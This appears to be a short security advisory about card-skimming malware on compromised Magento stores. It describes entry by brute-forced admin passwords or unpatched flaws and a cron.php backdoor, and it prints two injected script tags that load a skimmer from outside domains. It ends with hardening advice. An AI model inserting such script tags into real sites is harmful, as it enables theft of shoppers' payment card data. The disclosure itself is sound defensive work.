After getting into Magento backend with a stolen (brute-forced) password or via one of known vulnerabilities on unpatched Magento shop, skimmers inject the following piece of HTML into header or footer:
<script type="text/javascript" src="https://magentocore.net/mage/mage.js"></script>
Reported to Google a few months ago, it is finally getting banned in browsers in late August 2018 and now skimmers replacing
magentocore.net
with magento.name
:<script type="text/javascript" src="https://magento.name/mage/mage.js"></script>
Note: The malware adds backdoor into cron.php
file to re-inject own code if it is removed.
Make sure that your store is well patched, admin backend is hidden, you know all admin users listed at System > Permissions > Users in your Magento backend and all of them have a strong password set.